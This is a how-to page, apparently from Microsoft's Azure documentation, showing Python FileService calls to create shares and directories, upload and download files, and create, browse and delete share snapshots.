Create an Azure File share
In the following code example, you can use a
FileService object to create the share if it doesn't exist.
file_service.create_share('myshare')
Create a directory
You can also organize storage by putting files inside sub-directories instead of having all of them in the root directory. Azure Files allows you to create as many directories as your account will allow. The code below will create a sub-directory named sampledir under the root directory.
file_service.create_directory('myshare', 'sampledir')
Enumerate files and directories in an Azure File share
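To list what a share or directory contains, use list_directories_and_files; a minimal sketch reusing the 'myshare' share and 'sampledir' directory created above:

# List the files and directories that live directly under 'sampledir'.
generator = file_service.list_directories_and_files('myshare', 'sampledir')
for file_or_dir in generator:
    print(file_or_dir.name)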
Upload a file
An Azure File share contains at the very least a root directory in which files can reside.
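As a sketch (the local file name 'sample.txt' and the target name 'myfile' are only illustrative), a file can be uploaded from a local path with create_file_from_path:

from azure.storage.file import ContentSettings

# Upload the local file 'sample.txt' into the root of the share as 'myfile'.
file_service.create_file_from_path(
    'myshare',       # share name
    None,            # directory path; None means the root directory
    'myfile',        # name the file gets in the share
    'sample.txt',    # path of the local file to upload
    content_settings=ContentSettings(content_type='text/plain'))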
Download a file
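A corresponding sketch for downloading (again, the local target path is illustrative) uses get_file_to_path:

# Download 'myfile' from the root of the share to a local file 'out-sample.txt'.
file_service.get_file_to_path('myshare', None, 'myfile', 'out-sample.txt')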
Create share snapshot (preview)
You can create a point in time copy of your entire file share.
snapshot = file_service.snapshot_share(share_name)
snapshot_id = snapshot.snapshot
Create share snapshot with metadata
metadata = {"foo": "bar"} snapshot = file_service.snapshot_share(share_name, metadata=metadata)
List shares and snapshots
You can list all the snapshots for a particular share.
shares = list(file_service.list_shares(include_snapshots=True))
Browse share snapshot
You can browse content of each share snapshot to retrieve files and directories from that point in time.
directories_and_files = list(file_service.list_directories_and_files(share_name, snapshot=snapshot_id))
Get file from share snapshot
You can download a file from a share snapshot for your restore scenario.
with open(FILE_PATH, 'wb') as stream:
    file = file_service.get_file_to_stream(share_name, directory_name, file_name, stream, snapshot=snapshot_id)
Delete a single share snapshot
You can delete a single share snapshot.
file_service.delete_share(share_name, snapshot=snapshot_id)
Delete share when share snapshots exist
A share that contains snapshots cannot be deleted unless all the snapshots are deleted first.
file_service.delete_share(share_name, delete_snapshots=DeleteSnapshot.Include)
Next steps
Now that you've learned how to manipulate Azure Files with Python, follow these links to learn more.
|
https://docs.microsoft.com/en-us/azure/storage/files/storage-python-how-to-use-file-storage
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
scholarly 0.1.3
Simple access to Google Scholar authors and citations
scholarly.py is a module that allows you to retrieve author and publication information from Google Scholar in a friendly, Pythonic way.
Usage
Because scholarly does not use an official API, no key is required. Simply:
import scholarly
print scholarly.search_author('Steven A. Cholewiak').next()
Methods
- search_author – Search for an author by name and return a generator of Author objects.
>>> search_query = scholarly.search_author('Manish Singh') >>> print search_query.next() {'_filled': False, 'affiliation': u'Rutgers University, New Brunswick, NJ', 'citedby': 2283, 'email': u'@ruccs.rutgers.edu', 'id': '9XRvM88AAAAJ', 'interests': [u'Human perception', u'Computational Vision', u'Cognitive Science'], 'name': u'Manish Singh', 'url_citations': '/citations?user=9XRvM88AAAAJ&hl=en', 'url_picture': '/citations/images/avatar_scholar_150.jpg'}
- search_keyword – Search by keyword and return a generator of Author objects.
>>> search_query = scholarly.search_keyword('Haptics') >>> print search_query.next() {'_filled': False, 'affiliation': u'Stanford University', 'citedby': 18625, 'email': u'@cs.stanford.edu', 'id': '4arkOLcAAAAJ', 'interests': [u'Robotics', u'Haptics', u'Human Motion'], 'name': u'Oussama Khatib', 'url_citations': '/citations?user=4arkOLcAAAAJ&hl=en', 'url_picture': '/citations/images/avatar_scholar_150.jpg'}
- search_pubs_query – Search for articles/publications and return generator of Publication objects.
>>> search_query = scholarly.search_pubs_query('Perception of physical stability and center of mass of 3D objects') >>> print search_query.next() {'_filled': False, 'bib': {'abstract': u'Humans can judge from vision alone whether an object is physically stable or not. Such judgments allow observers to predict the physical behavior of objects, and hence to guide their motor actions. We investigated the visual estimation of physical stability of 3-D ...', 'author': u'SA Cholewiak and RW Fleming and M Singh', 'eprint': u'', 'title': u'Perception of physical stability and center of mass of 3-D objects', 'url': u''}, 'source': 'scholar', 'url_scholarbib': u'/scholar.bib?q=info:K8ZpoI6hZNoJ:scholar.google.com/&output=citation&hl=en&ct=citation&cd=0'}
Example
Here’s a quick example demonstrating how to retrieve an author’s profile then retrieve the titles of the papers that cite his most popular (cited) paper.
>>> # Retrieve the author's data, fill-in, and print
>>> search_query = scholarly.search_author('Steven A Cholewiak')
>>> author = search_query.next().fill()
>>> print author
>>> # Print the titles of the author's publications
>>> print [pub.bib['title'] for pub in author.publications]
>>> # Take a closer look at the first publication
>>> pub = author.publications[0].fill()
>>> print pub
>>> # Which papers cited that publication?
>>> print [citation.bib['title'] for citation in pub.citedby()]
Installation
Use pip:
pip install scholarly
Or clone the package:
git clone
Requirements
Requires bibtexparser, Beautiful Soup, and python-dateutil.
Changes
Note that because of the nature of web scraping, this project will be in perpetual alpha.
v0.1.3
- Raise an exception when we receive a Bot Check. Reorganized test.py alphabetically and updated its test cases. Reorganized README. Added python-dateutil as installation requirement, for some reason it was accidentally omitted.
v0.1.2
- Now request HTTPS connection rather than HTTP and update test.py to account for a new “Zucker”. Also added information for the v0.1.1 revision.
v0.1.1
- Fixed an issue with multi-page Author results, author entries with no citations (which are rare, but do occur), and added some tests using unittest.
v0.1
- Initial release.
License
The original code that this project was forked from was released by Bello Chalmers under a WTFPL license. In keeping with this mentality, all code is released under the Unlicense.
- Author: Steven A. Cholewiak
- Download URL:
- Keywords: Google Scholar,academics,citations
- License: Unlicense
- Categories
- Package Index Owner: scholewiak
- DOAP record: scholarly-0.1.3.xml
|
https://pypi.python.org/pypi/scholarly/0.1.3
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
I've been working on a project off and on in SDL for a number of months now, and I've had an issue from the start that I recently had some time to try and debug. I've been developing on Windows XP until this past week, so it was not really an issue until now.
Basically, my SDL-based game works perfectly fine on any Windows XP machine (ie. normal frame rate, shaders work no problem), but I initially noticed that if I ran the executable on Windows 7, the frame rate would only be 10-15 for no reason (on super high-end machines, ie. Phenom II X6 / 5970) but this was strictly a Windows 7 issue as indicated by testing on several different machines. Upon further investigation I realized that if I run the game from within Visual Studio 2008 on a Windows 7 machine it works perfectly (ie. 7000+ FPS w/o vsync), but as soon as I ran it from the executable instead, the frame rate would once again be between 10 and 15, and if shaders were being used via GLEW, the program would simply exit because GLEW 2.0 was unavailable.
tldr; SDL OpenGL game, works fine on XP, on Win7 works fine in VS2008 but EXE limited to 10 fps and shaders wont work
Honestly not sure what the issue could possibly be and has been baffling me for some time. If anyone has any suggestions or input, it would be greatly appreciated. It almost seems like SDL is somehow switching to software mode or some limited version of OpenGL. Also worth mentioning that the only things being rendered is some text (generated and rendered via lists) and a very simple skybox with 1024x1024 textures for each side.
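One quick way to check that suspicion (my suggestion, not something from the original post) is to print the OpenGL strings right after SDL_SetVideoMode; if the standalone EXE reports something like "GDI Generic" / version 1.1.0 instead of your vendor's driver, the context has fallen back to Microsoft's software renderer, which would explain both the low frame rate and GLEW reporting that OpenGL 2.0 is unavailable:

#include <cstdio>
#include <SDL_opengl.h>

// Call this right after SDL_SetVideoMode() succeeds.
void dumpGLInfo()
{
    printf("GL_VENDOR:   %s\n", (const char *)glGetString(GL_VENDOR));
    printf("GL_RENDERER: %s\n", (const char *)glGetString(GL_RENDERER));
    printf("GL_VERSION:  %s\n", (const char *)glGetString(GL_VERSION));
}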
My game is using SDLmain and a number of libraries, including:
SDL
SDL_ttf
GLEW
FreeImage
Qt
FMOD Ex
FBX SDK
Bullet Physics
Thanks for reading. Some code, if it helps any:
Main.cpp:
#include "Game.h" int main(int argc, char * argv[]) { Game * game = new Game(); if(!game->init()) { return -1; } game->run(); delete game; return 0; }
OpenGL Setup:
bool Game::init()
{
    if(m_initialized)
    {
        return false;
    }

    settings->load();

    if(SDL_Init(SDL_INIT_VIDEO | SDL_INIT_TIMER | SDL_INIT_JOYSTICK) == -1)
    {
        return false;
    }

    SDL_GL_SetAttribute(SDL_GL_DOUBLEBUFFER, 1);
    SDL_GL_SetAttribute(SDL_GL_SWAP_CONTROL, settings->verticalSync ? 1 : 0);

    m_graphics = SDL_SetVideoMode(settings->windowWidth, settings->windowHeight, 0,
                                  SDL_OPENGL | (settings->fullScreen ? SDL_FULLSCREEN : 0));

    SDL_WM_SetCaption("Game", NULL);

    QString iconPath;
    iconPath.append(QString("%1/Icons/Block.bmp").arg(settings->dataDirectoryName));
    QByteArray iconPathBytes = iconPath.toLocal8Bit();
    m_icon = SDL_LoadBMP(iconPathBytes.data());
    SDL_WM_SetIcon(m_icon, NULL);

    glShadeModel(GL_SMOOTH);
    glClearColor(0.0f, 0.0f, 0.0f, 0.0f);
    glClearDepth(1.0f);
    glEnable(GL_DEPTH_TEST);
    glEnable(GL_TEXTURE_2D);
    glEnable(GL_BLEND);
    glDepthFunc(GL_LEQUAL);
    glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA);
    glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST);
    glMatrixMode(GL_MODELVIEW);
    glViewport(0, 0, settings->windowWidth, settings->windowHeight);

    if(glewInit() != GLEW_OK)
    {
        return false;
    }

    if(!GLEW_VERSION_2_0)
    {
        return false;
    }

    etc.
Game Loop:
void Game::run()
{
    if(!m_initialized)
    {
        return;
    }

    m_running = true;

    SDL_Event event;
    static unsigned int lastTime = SDL_GetTicks();
    unsigned int currentTime = SDL_GetTicks();

    do
    {
        if(SDL_PollEvent(&event))
        {
            switch(event.type)
            {
                case SDL_KEYDOWN:
                    if(!console->isActive()) { menu->handleInput(event); }
                    if(!menu->isActive()) { console->handleInput(event); }
                    break;

                case SDL_MOUSEMOTION:
                    if(!console->isActive() && !menu->isActive() &&
                       SDL_GetAppState() & SDL_APPMOUSEFOCUS &&
                       SDL_GetAppState() & SDL_APPINPUTFOCUS &&
                       SDL_GetAppState() & SDL_APPACTIVE)
                    {
                        camera->handleInput(event);
                    }
                    break;

                case SDL_QUIT:
                    m_running = false;
                    break;

                default:
                    break;
            }
        }

        if(m_running)
        {
            currentTime = SDL_GetTicks();
            update(currentTime - lastTime);
            draw();
            lastTime = currentTime;
        }
    } while(m_running);
}
|
http://www.gamedev.net/topic/620879-sdl-super-slow-framerate-on-windows-7-glew-shaders-unavailable/?forceDownload=1&_k=880ea6a14ea49e853634fbdc5015a024
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
Controller Extension in OAF
By PRajkumar on Jul 15, 2012
Oracle does not recommend that customers extend controller objects associated with regions or webbeans in shipped E-Business Suite product pages.
Controller class (oracle.apps.fnd.framework.webui.OAControllerImpl) methods should effectively be considered private, since their implementation is subject to change. Controller extensions are therefore not considered to be durable between upgrades.
If it is absolutely essential to handle custom form submit events on a shipped product page, processFormRequest() is the only method that should be overriden in a controller class, although the risks outlined above still apply.
Let us try to Extend Controller in OAF Page –
Create one search page as explained in below link –
In this exercise I am going to extend CO of SearchPG. First lets create CO for SearchPG.
Right Click PageLayoutRN under SearchPG page > Set New Controller
Package Name -- prajkumar.oracle.apps.fnd.searchdemo.webui
Class Name -- SearchCO
Now we will extend this newly created CO under this exercise.
The purpose of this exercise is to modify the VO query of results table. I have changed the Column1 and Column2 fields Property Selective Search Criteria as False.
Now when we click on Go button all the records are displaying in the results table and our OBJECTIVE is to bind the VO query of results table in such a way that in result Column1 value val5 and Column2 value val6 should not come as result on click Go button
Now for knowing which controller to extend we click on "About This Page" Link and select Expand All. Here we can see the Name of the controller that we need to extend
1. Create a New Workspace and Project
File > New > General > Workspace Configured for Oracle Applications
File Name – PrajkumarCOExtensionDemo
Automatically a new OA Project will also be created
Project Name -- COExtensionDemo
Default Package -- prajkumar.oracle.apps.fnd.coextensiondemo class
3. Write below logic in ExtendedCO Java Class
package prajkumar.oracle.apps.fnd.coextensiondemo.webui;
import prajkumar.oracle.apps.fnd.searchdemo.webui.SearchCO;
import oracle.apps.fnd.framework.webui.OAPageContext;
import oracle.apps.fnd.framework.webui.beans.OAWebBean;
import oracle.apps.fnd.framework.OAApplicationModule;
import oracle.apps.fnd.framework.webui.beans.layout.OAQueryBean;
import prajkumar.oracle.apps.fnd.searchdemo.server.SearchVOImpl;
public class XXItemSearchCO extends ItemSearchCO
{
public XXItemSearchCO()
{
}
public void processFormRequest(OAPageContext pageContext, OAWebBean webBean)
{
super.processFormRequest(pageContext, webBean);
OAApplicationModule am = pageContext.getApplicationModule(webBean);
OAQueryBean queryBean = (OAQueryBean)webBean.findChildRecursive("QueryRN");
//Capturing Go Button ID
String go = queryBean.getGoButtonName();
//If its Not NULL which mean user has pressed "Go" Button
if(pageContext.getParameter(go)!=null)
{
// Setting whereClause at Runtime to restrict the query
SearchVOImpl vo = (SearchVOImpl)am.findViewObject("SearchVO1");
vo.setWhereClause(null);
vo.setWhereClause("Column1 <>:1 AND Column2 <>:2");
vo.setWhereClauseParam(0,"val5");
vo.setWhereClauseParam(1,"val6");
}
}
}
4. Attach new controller to SearchPG through personalization
Click on Personalize Page link on top right hand side of your page
Note -- If you are not able to see this link then go through below link –
Click on Complete View -> Expand All -> Click on personalize icon next to Page Layout
Now at site level give the path of extended controller as we are extending the controller at SITE LEVEL
prajkumar.oracle.apps.fnd.coextensiondemo.webui.ExtendedCO
Click Apply -> Return to Application
5. Congratulation you have successfully finished. Run Your SearchPG page and Test Your Work
Click Go
Note – Record with Column1 value val5 and Column2 value val6 is not coming in result
|
https://blogs.oracle.com/prajkumar/entry/controller_extension_in_oaf
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
Normalizing arguments
Discussion in 'Python' started by Dan Ellis, Oct 17, 2008.,200
- Chris Smith
- Jan 12, 2005
Normalizing XHTML with XMLRyan Stewart, May 11, 2006, in forum: XML
- Replies:
- 3
- Views:
- 438
- Ryan Stewart
- May 11, 2006
Normalizing tm structure past 2038Stu, Oct 31, 2003, in forum: C Programming
- Replies:
- 5
- Views:
- 496
- Chris Torek
- Nov 1, 2003
What is normalizing in XML?, Apr 9, 2007, in forum: Java
- Replies:
- 1
- Views:
- 393
- Joshua Cranmer
- Apr 9, 2007
XSLT: Normalizing namespacesThomas Wittek, Aug 30, 2007, in forum: XML
- Replies:
- 5
- Views:
- 1,322
- Martin Honnen
- Aug 31, 2007
|
http://www.thecodingforums.com/threads/normalizing-arguments.640348/
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
ot::VRPNSource Class ReferenceVRPN client interface node.
More...
[Network Classes]
#include <VRPNSource.h>
Inheritance diagram for ot::VRPNSource:
Detailed DescriptionVRPN client interface node.
Connects to a VRPN server and reports incoming tracking data.
- Author:
- Gerhard Reitmayr
Definition at line 81 of file VRPNSource.h.
Member Enumeration Documentation
type of connection
- Enumerator:
-
Definition at line 87 of file VRPNSource.h.
Constructor & Destructor Documentation
constructor method,sets commend member
Definition at line 101 of file VRPNSource.cxx.
destructor
Definition at line 110 of file VRPNSource.cxx.
References trackerObj.
Member Function Documentation
tests for EventGenerator interface being present.
Is overriden to return 1 always.
- Returns:
- always 1
Reimplemented from ot::Node.
Definition at line 115 of file VRPNSource.h.
Executes the vrpn object's mainloop.
Only for internal use by the associated module.
Definition at line 141 of file VRPNSource.cxx.
References trackerObj.
Opens connection to the VRPN server.
Only for internal use by the associated module.
Definition at line 119 of file VRPNSource.cxx.
References BUTTON, buttonChangeCallback(), name, TRACKER, trackerObj, trackerPosOriCallback(), and type.
Friends And Related Function Documentation
Definition at line 123 of file VRPNSource.h.
Member Data Documentation
event object for data flow
Definition at line 91 of file VRPNSource.h.
name
Reimplemented from ot::Node.
Definition at line 85 of file VRPNSource.h.
Referenced by ot::VRPNModule::createNode(), and start().
station number of station to report
Definition at line 89 of file VRPNSource.h.
Referenced by ot::VRPNModule::createNode().
data pointer to underlying vrpn object
Definition at line 96 of file VRPNSource.h.
Referenced by mainloop(), start(), and ~VRPNSource().
type of connection
Reimplemented from ot::Node.
Referenced by ot::VRPNModule::createNode(), and start().
The documentation for this class was generated from the following files:
|
http://studierstube.icg.tugraz.at/opentracker/html/classot_1_1VRPNSource.php
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
15 July 2011 06:38 [Source: ICIS news]
By Liu Xin
SHANGHAI (ICIS)--Asian polycarbonate (PC) prices may continue falling for the rest of the year because of sluggish demand and plummeting values of feedstock bisphenol A (BPA), industry sources said on Friday.
Spot PC prices have shed $200-300/tonne (€142-213/tonne) since early April to $2,950-3,050/tonne CIF (cost, insurance and freight)
In the key
“Demand from
Export orders also weakened because of a stronger Chinese currency, sources said.
Suppliers are pinning their hopes on a demand recovery in September, when orders for the year-end holidays flow in. However, it remains to be seen if any demand recovery could materialise given a gloomy economic outlook, industry players said.
“The [PC price] downtrend will continue in August, and even in the fourth quarter, given the sharp falls in feedstock BPA numbers,” said a northeast Asian trader.
BPA spot prices plunged $300/tonne or 13% over the past two weeks to settle at $2,000-2,030/tonne CFR (cost and freight)
This has further dampened the appetite of PC buyers, which are sidelined because of falling prices.
“Price declines are inevitable next month,” said a PC maker, adding that margins remain under pressure despite falling feedstock costs.
Margins have been squeezed in the first half of the year, particularly for optical grade PC, because of ample supply and stiff price competition, market sources said.
The spread between BPA and PC had narrowed to $600-800/tonne, which was considered unhealthy by industry players. A preferred spread should be over $800/tonne.
Although PC suppliers have yet to recoup eroded margins, they are expected to cut prices further in the wake of prevailing weak market conditions.
Regional supply is expected to increase soon, when operations at Formosa Idemitsu Petrochemical Corp’s (FIPC) PC plant in Mailiao fully resumes this month and with fresh cargoes expected from Saudi Basic Industries Corp’s (SABIC) 260,000 tonne/year PC plant at Al Jubail, Saudi Arabia.
FIPC’s three production lines in
“The market is bearish. Buyers prefer to keep inventory at minimum level as supply is long while demand is weak,” a China-based trader said.
PC is a type of high specification engineering plastic, suitable for moulding and with a high resistance. Typical applications include automobiles, CDs and DVDs, electronic casings, returnable milk bottles, lighting and greenhouses.
($1 = €0
|
http://www.icis.com/Articles/2011/07/15/9477369/asia-pc-to-remain-on-downtrend-on-weak-demand-bpa-slump.html
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
Hi, I've been trying to figure out how to find where the biggest number in an array is. I know how to find the biggest number, but I need to find out where it is, like which row or index it's in.
Code :
import java.util.Scanner;

public class array {
    public static void main (String args[]) {
        Scanner keyboard = new Scanner(System.in);
        int r[] = new int[50];
        int n=0;
        int x, bigSoFar;

        System.out.print("Enter list: ");
        x = keyboard.nextInt();
        while( x!= -999);
        {
            r[n] = x;
            n++;
            x = keyboard.nextInt();
        }

        for(int k = 0; k < n; k++)
            if(r[k]> bigSoFar)
            {
                bigSoFar = r[k];
            }
        System.out.println(r[k]);
    }
}
Although first i'm having trouble trying to get my first code to work, i keep getting this error
array.java:34: error: cannot find symbol
System.out.println(r[k]);
^
symbol: variable k
location: class array
1 error
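For reference, here is a minimal corrected sketch of the same program (the sentinel value -999 and the fixed-size array are kept from the post above; tracking the index separately is one way to answer the "where is it" part of the question):

import java.util.Scanner;

public class BiggestFinder {
    public static void main(String[] args) {
        Scanner keyboard = new Scanner(System.in);
        int[] r = new int[50];
        int n = 0;

        System.out.print("Enter list (end with -999): ");
        int x = keyboard.nextInt();
        while (x != -999 && n < r.length) {   // note: no stray ';' after the condition
            r[n++] = x;
            x = keyboard.nextInt();
        }

        if (n == 0) {
            System.out.println("No numbers entered.");
            return;
        }

        int bigSoFar = r[0];   // must be initialized before it is compared
        int bigIndex = 0;      // remembers where the biggest value lives
        for (int k = 1; k < n; k++) {
            if (r[k] > bigSoFar) {
                bigSoFar = r[k];
                bigIndex = k;
            }
        }
        // k is out of scope after the loop, so print the saved index instead
        System.out.println("Biggest value " + bigSoFar + " at index " + bigIndex);
    }
}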
|
http://www.javaprogrammingforums.com/%20whats-wrong-my-code/29005-how-find-where-biggest-number-array-printingthethread.html
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
The blog of the F# team at Microsoft
In this blog post, I show off a number of F# integration features in Visual Studio 2012, by walking through an end-to-end scenario of authoring and testing an F# library. The code itself is not the focus; rather, I’ll focus on the IDE tooling as we walk through the scenario. In the end, we’ll have a small application and library supported by unit tests, but along the way we’ll also learn more about a smattering of IDE features including online project templates and NuGet. I expect there will be something new everyone can learn from this blog, regardless of whether you’re an F# novice or an experienced Visual Studio developer. So let’s get to it!
In Visual Studio, when you want to create a new application or library, you start by selecting ‘New Project’, which brings up the New Project Dialog (NPD). The NPD is filled with a variety of project templates, which help you create starter projects that contain basic project files, references, and sometimes some starter source code, in order to make it easy to get off the ground for various scenarios. In Visual Studio 2012, the NPD comes with 5 F# project templates, pictured below.
The “F# Application” and “F# Library” are probably the most commonly-used templates; they create F# EXEs and DLLs respectively. The “F# Tutorial” project starts you off with an F# script with lots of comments and short examples, and serves as a quick tour of some language features and syntax examples. The “F# Silverlight Library” is used for creating a library that targets Silverlight 5, and the “F# Portable Library” is used if you want to create a single DLL that can run on Silverlight 5, on the Windows desktop, or as part of a new Windows 8 app. Most folks know about this portion of the NPD, as you visit this dialog each time you create a new project.
Something that is perhaps less well-known is that there are a variety of online templates available directly from the NPD as well. In the left-hand pane, if you select ‘Online’, then ‘Templates’ and ‘Visual F#’ you can see lots more project templates for creating starter projects that use F# in a various of frameworks:
These templates have been contributed by the community to the Visual Studio Gallery (from the website, you can also browse for templates). We’ll see how easy and useful it can be to take advantage of these online templates in a moment. But while we’re looking at the NPD, I’ll also point out that samples are also available from the left-hand pane:
I’ll discuss both online samples from the NPD, as well as other places to get F# samples, in a future blog post; for now I just wanted to point out this way to obtain some F# samples right from inside Visual Studio.
For the purpose of exposition for the rest of this blog post, it is useful to have a small sample F# application & library on-hand, so let’s create one. Since this blog is about Visual Studio tooling for F#, and not so much about code, I’ll resort to a trite but familiar example, with my apologies to those who are tired of seeing F# compute prime numbers. I’ll start with a new F# Library project with this code:
module PrimesLib

open Microsoft.FSharp.Collections

let odds =
    let limit = System.Int32.MaxValue |> float |> sqrt |> int
    [3..2..limit]

let isPrime n = // naïve implementation
    2::odds |> Seq.forall (fun x -> n%x <> 0 || n=x)
and then I’ll try it out it by adding an F# Application to the solution, add a project reference to my library, and putting the code
open PrimesLib

[2..20] |> List.filter isPrime |> printfn "%A"
in the app. I set the application as the startup project, build, and run, and I see the expected output:
[2; 3; 5; 7; 11; 13; 17; 19]
Now that we have a simple library and app, let’s show off some Visual Studio 2012 features.
In Visual Studio 2012, F# works with MSTest, and there is a good online template to get started. I’ll add a new project to our solution, and then in the NPD, click ‘Online’ in the left pane, and then type “F# mstest” in the search box at the upper-right:
That’s the template we want. I create a project from the template (if this is my first time using this online template, I’ll be prompted to download & install the template after agreeing to any license terms an online template may contain), which starts us with starter source code for our test library:
namespace UnitTestProject1

open System
open Microsoft.VisualStudio.TestTools.UnitTesting

[<TestClass>]
type UnitTest() =
    [<TestMethod>]
    member x.TestMethod1 () =
        let testVal = 1
        Assert.AreEqual(1, testVal)
Let’s replace the sample test method with our own code that gives us some confidence that isPrime is working correctly. I’ll add a project reference from the unit test project to my primes library, and then replace the unit test method with
[<TestMethod>]
member x.TestIsPrime() =
    let expected = [2;3;5;7;11;13;17;19]
    let actual = [2..20] |> List.filter PrimesLib.isPrime
    Assert.AreEqual(expected, actual)
Now we can run the test by selecting ‘TEST\Run…\All Tests’ from the VS menu, and VS will run the unit tests:
Great! We have a passing unit test. Now we can evolve our code with more confidence. Perhaps next I’m trying to discover which digit is most common for prime numbers to end in. I might want to add the function
let finalDigitOfPrimesUpTo n =
    [|2..n|]
    |> Seq.filter isPrime
    |> Seq.groupBy (fun i -> i % 10)
    |> Seq.map (fun (k, vs) -> (k, Seq.length vs))
    |> Seq.sortBy fst
    |> Seq.toList
to get a sample of the data for all the primes up to N. I can run it from my app by adding this code
printfn "%A" (finalDigitOfPrimesUpTo 500000)
which eventually prints
[(1, 10386); (2, 1); (3, 10382); (5, 1); (7, 10403); (9, 10365)]
showing me that primes appear to be pretty evenly distributed among numbers ending in the digits 1, 3, 7, or 9.
Let’s add a unit test for this code:
[<TestMethod>]
member x.TestFinalDigits() =
    let expected = [(1,10386); (2,1); (3,10382); (5,1); (7,10403); (9,10365)]
    let actual = PrimesLib.finalDigitOfPrimesUpTo 500000
    Assert.AreEqual(expected, actual)
I notice that this computation takes a while to run—about 12 seconds on my machine. A very simple way to speed this up is to do the computations for each number in parallel. I happen to know that the F# Powerpack contains a ‘PSeq’ module, which works like ‘Seq’, but runs functions like ‘filter’ and ‘map’ in parallel. I’d like to try applying it to this code, but how do I obtain the F# Powerpack to use in my solution? NuGet to the rescue!
NuGet is package management system that’s integrated into Visual Studio 2012, making it very easy to obtain and use a variety of libraries in your project. I can right-click on my library project to find ‘Manage NuGet Packages…’ on the context menu in VS:
which brings up the dialog pictured below for NuGet. I can type ‘fsharp’ (note: not ‘F#’; the search here does not like the ‘#’ character) in the search box in the upper-right, and see that
there are a lot of packages written for (and in) F#. In this case, I can just click on the FSPowerPack.Community package, click install, agree to the license terms, and then I can see that the Powerpack has been added to my library project if I look at the references:
Now in the code for finalDigitOfPrimesUpTo, I can replace each “Seq.” with “PSeq.” and if I rerun my app, I see that the running time on my machine has gone down to about 3 seconds (previously it took about 12). NuGet makes it extremely easy to obtain useful libraries and integrate them into your projects without ever leaving the Visual Studio 2012 IDE.
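For readers following along, here is a sketch of what that substitution might look like (this assumes the PowerPack's PSeq module offers parallel counterparts of the Seq functions used here, and that the existing 'open Microsoft.FSharp.Collections' in PrimesLib brings PSeq into scope once the package is referenced; keeping the cheap final steps on Seq is just one way to write it):

let finalDigitOfPrimesUpTo n =
    [|2..n|]
    |> PSeq.filter isPrime                          // the expensive primality checks now run in parallel
    |> PSeq.groupBy (fun i -> i % 10)
    |> PSeq.map (fun (k, vs) -> (k, Seq.length vs))
    |> Seq.sortBy fst
    |> Seq.toList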
If I rerun the unit tests at this point, I’m in for a little surprise:
The unit test fails with
FileLoadException: Could not load file or assembly 'FSharp.Core, Version=4.0.0.0, …'. The F# Powerpack package I added was (at the time I authored this blog post; it may have since been updated) built against F# in Visual Studio 2010, and has a reference to FSharp.Core 4.0.0.0 (the F# runtime in Visual Studio 2010). In Visual Studio 2012, there’s a newer version of the F# runtime, FSharp.Core 4.3.0.0, which is compatible, but has some new added features. Things worked fine when I ran this from the app, thanks to bindingRedirect in the App.config file in the console application which declares that it’s fine to use the 4.3.0.0 version instead of the 4.0.0.0 version of FSharp.Core. Indeed, our unit test project also has the appropriate App.config file, which should allow the CLR to load the newer version of the F# runtime, even though the F# Powerpack claims to depend on the old one. However a bug* in the MSTest runner means that it ignores the App.config file in the unit test project. Fortunately, there is a simple workaround you can apply with an MSTest ‘runsettings’ file, and such a file has been included by default in the F# MSTest project template. Simply select ‘TEST\Test Settings\Select Test Settings File’ from the menu in VS, and point it at the MSTest.runsettings file in the unit test project. Now MSTest will pick up the App.config from the unit tests, and all our tests pass again.
(* - this bug is present in Visual Studio 2012 at the time of this blog post (September 2012), though it may be fixed in future update to Visual Studio.)
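For reference, the App.config mechanism mentioned above looks roughly like this; treat it as an illustrative sketch rather than the exact file from the projects in this post (the publicKeyToken shown is the usual one for FSharp.Core, and the version numbers mirror the 4.0.0.0-to-4.3.0.0 redirect described above):

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <!-- Redirect requests for older FSharp.Core versions to the VS2012 runtime -->
        <assemblyIdentity name="FSharp.Core" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-4.3.0.0" newVersion="4.3.0.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>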
And we’re done – we’ve got a library supported by unit tests, that leveraged both an online project template and a NuGet community package.
To sum up the experiences in this blog post:
I hope you’ve learned something new and useful today!
Brian McNamara Visual Studio F# Developer
Hi Brian, the code in this article is unreadable in both IE9 and Chrome (all goes on a single line).
Thanks for letting us know, ildjarn! Should be fixed now.
Hi. I like this technique: NuGet package Fsharpx TypeProvider XAML, ref. Expert F# 3.0 pg 469.
I used in recently (Feb 2013) on an F# 3.0, WPF, 3D .sln in VS'12 Pro.
Art
-------
// The full Nuget package path ... varies with your installation
#r @"C:\Users\Honu\SkyDrive\...\packages\FSharpx.Core.1.7.3\lib\40\FSharpx.Core.dll"
#r @"C:\Users\Honu\SkyDrive\...\packages\FSharpx.TypeProviders.Xaml.1.7.3\lib\40\FSharpx.TypeProviders.Xaml.dll"
// and opening the following namespaces ...
// Test F# + XAML concept --
// ... \packages\FSharpx.TypeProviders.Xaml.1.7.3\lib\40\FSharpx.TypeProviders.Xaml.dll
...
open FSharpx
type MainWindow = XAML<"CWDrawingSurface.xaml">
// Main Program
// 3D Scene Creation
#if COMPILED
[<System.STAThreadAttribute>]
do
// create our window
// technique: NuGet package Fsharpx TypeProvider XAML, ref. Expert F# 3.0 pg 469
// motivation: -- XAML is supported by Win8 and WP8(?)
// -- VS'12 Pro (and VS'12 Express for Web?) Blend support for F# 3.0
let w = MainWindow() // initializes typed access to *.xaml
let wnd = w.Root // gets the root element, i.e. Window
// Declare XAML Scene Objects
let myViewport3D = Viewport3D()
...
let data = GenerateGraphicsResult()
// let data = GraphicsResult(points, mesh, textures, rectangles, colors)
myMeshGeometry3D.Positions <- Point3DCollection(data.Points)
myMeshGeometry3D.TriangleIndices <- Int32Collection(data.Mesh)
myMeshGeometry3D.TextureCoordinates <- PointCollection(data.Texture)
|
http://blogs.msdn.com/b/fsharpteam/archive/2012/09/24/online-project-templates-nuget-and-unit-testing-with-f-in-vs2012.aspx
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
Parameters
